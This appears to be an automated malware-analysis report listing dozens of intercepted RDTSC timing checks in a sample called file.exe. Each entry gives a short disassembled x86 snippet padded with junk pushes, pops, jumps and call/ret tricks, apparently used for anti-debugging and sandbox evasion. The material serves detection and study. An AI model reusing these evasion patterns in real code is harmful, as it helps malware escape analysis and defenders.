                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110528 second address: 1110542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110542 second address: 1110561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov bx, 2AC4h 0x00000013 push 00000000h 0x00000015 mov edi, ebx 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110561 second address: 1110566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11114B6 second address: 11114BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11114BA second address: 11114CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FD648BC9AC6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11114CC second address: 11114D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11114D2 second address: 11114DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD648BC9AC6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111242F second address: 1112433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11124D5 second address: 11124DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11124DD second address: 11124F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD648C0B446h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11124F0 second address: 11124F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106B6 second address: 11106BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106BA second address: 11106CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106CB second address: 11106D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106D1 second address: 11106D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110F65F second address: 110F710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD648C0B44Dh 0x0000000e popad 0x0000000f nop 0x00000010 jp 00007FD648C0B448h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007FD648C0B44Eh 0x00000022 pop ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov eax, dword ptr [ebp+122D0B55h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FD648C0B448h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xor ebx, dword ptr [ebp+122D3A72h] 0x00000050 sbb ebx, 05896559h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007FD648C0B448h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 00000014h 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 jmp 00007FD648C0B455h 0x00000077 nop 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110F710 second address: 110F725 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FD648BC9AC6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111344D second address: 1113452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111165B second address: 1111661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11125E5 second address: 11125EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11125EB second address: 1112608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD648BC9AC6h 0x00000009 jmp 00007FD648BC9ACBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112608 second address: 111260E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111260E second address: 1112613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112613 second address: 1112619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112619 second address: 111261D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11143B3 second address: 11143B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111261D second address: 11126AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD648BC9AC8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FD648BC9AC8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 jmp 00007FD648BC9ACBh 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 add bx, 81E1h 0x00000055 mov eax, dword ptr [ebp+122D0105h] 0x0000005b mov edi, dword ptr [ebp+122D3796h] 0x00000061 push FFFFFFFFh 0x00000063 mov bl, A5h 0x00000065 nop 0x00000066 pushad 0x00000067 jbe 00007FD648BC9AC8h 0x0000006d pushad 0x0000006e popad 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FD648BC9ACAh 0x00000076 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11143B8 second address: 111441A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jne 00007FD648C0B448h 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D2CE3h], ecx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FD648C0B448h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 sub bl, 00000034h 0x00000038 push 00000000h 0x0000003a jmp 00007FD648C0B452h 0x0000003f mov bl, 87h 0x00000041 push eax 0x00000042 je 00007FD648C0B454h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11126AE second address: 11126D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD648BC9AD8h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FD648BC9AC6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11126D7 second address: 11126DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11153CA second address: 11153EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD648BC9AD2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD648BC9AC6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11153EB second address: 1115401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B452h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114543 second address: 1114548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11165BB second address: 11165BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119623 second address: 111963C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BBEC second address: 111BBF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BBF0 second address: 111BBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BBFA second address: 111BC27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD648C0B44Bh 0x0000000d jmp 00007FD648C0B450h 0x00000012 popad 0x00000013 pushad 0x00000014 js 00007FD648C0B44Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BC27 second address: 111BC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BC2F second address: 111BC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD648C0B446h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BC39 second address: 111BC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112259D second address: 11225A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11225A3 second address: 11225A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112286A second address: 1122870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1122870 second address: 1122879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1122879 second address: 112287D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112287D second address: 112288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FD648BC9AD0h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129636 second address: 1129640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD648C0B446h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129640 second address: 1129644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129878 second address: 112987C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129946 second address: F3EB58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 1EA69571h 0x00000011 je 00007FD648BC9AD4h 0x00000017 pushad 0x00000018 jne 00007FD648BC9AC6h 0x0000001e je 00007FD648BC9AC6h 0x00000024 popad 0x00000025 push dword ptr [ebp+122D0F61h] 0x0000002b clc 0x0000002c call dword ptr [ebp+122D3545h] 0x00000032 pushad 0x00000033 sub dword ptr [ebp+122D2EEEh], edx 0x00000039 xor eax, eax 0x0000003b mov dword ptr [ebp+122D2EEEh], ecx 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007FD648BC9ACDh 0x0000004a mov dword ptr [ebp+122D3A0Ah], eax 0x00000050 pushad 0x00000051 push ebx 0x00000052 mov dword ptr [ebp+122D1FC2h], ebx 0x00000058 pop esi 0x00000059 add cx, 57BEh 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 add dword ptr [ebp+122D2EEEh], ecx 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e add dword ptr [ebp+122D1FC2h], ebx 0x00000074 lodsw 0x00000076 pushad 0x00000077 or bh, FFFFFFF0h 0x0000007a popad 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jl 00007FD648BC9AD8h 0x00000085 jmp 00007FD648BC9AD2h 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e jnc 00007FD648BC9AE6h 0x00000094 nop 0x00000095 push eax 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FC01 second address: 112FC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B453h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FDA3 second address: 112FDB0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FDB0 second address: 112FDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD648C0B446h 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD648C0B454h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130095 second address: 1130099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130510 second address: 1130514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135E21 second address: 1135E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135E25 second address: 1135E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135E29 second address: 1135E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD648BC9AD2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11352C4 second address: 11352CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11352CB second address: 11352E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11352E3 second address: 1135304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD648C0B459h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134934 second address: 1134939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134939 second address: 113493F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113493F second address: 1134943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134943 second address: 1134947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1100967 second address: 1100970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135729 second address: 1135749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD648C0B459h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135749 second address: 1135752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135B1B second address: 1135B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF33C second address: 10BF342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EFFA second address: 113F000 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DEF4 second address: 113DEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DEFA second address: 113DEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DEFE second address: 113DF0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD648BC9AC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DF0E second address: 113DF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DF14 second address: 113DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD648BC9AC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FD648BC9AC6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DF3C second address: 113DF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103EE8 second address: 10DF026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ecx, dword ptr [ebp+12488708h] 0x0000000e call dword ptr [ebp+122D2C30h] 0x00000014 je 00007FD648BC9ADEh 0x0000001a jc 00007FD648BC9ACAh 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jbe 00007FD648BC9AC6h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103FF8 second address: 1104011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FD648C0B44Ch 0x0000000b jne 00007FD648C0B446h 0x00000011 popad 0x00000012 push eax 0x00000013 push esi 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11046F5 second address: 11046FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11046FB second address: 110473E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD648C0B450h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FD648C0B448h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 nop 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110473E second address: 1104742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104742 second address: 1104746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E10 second address: 1104E34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edx, 5773ED2Fh 0x0000000f push 0000001Eh 0x00000011 add dword ptr [ebp+1245D3E3h], edx 0x00000017 mov edi, dword ptr [ebp+122D3A56h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E34 second address: 1104E46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104E46 second address: 1104E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
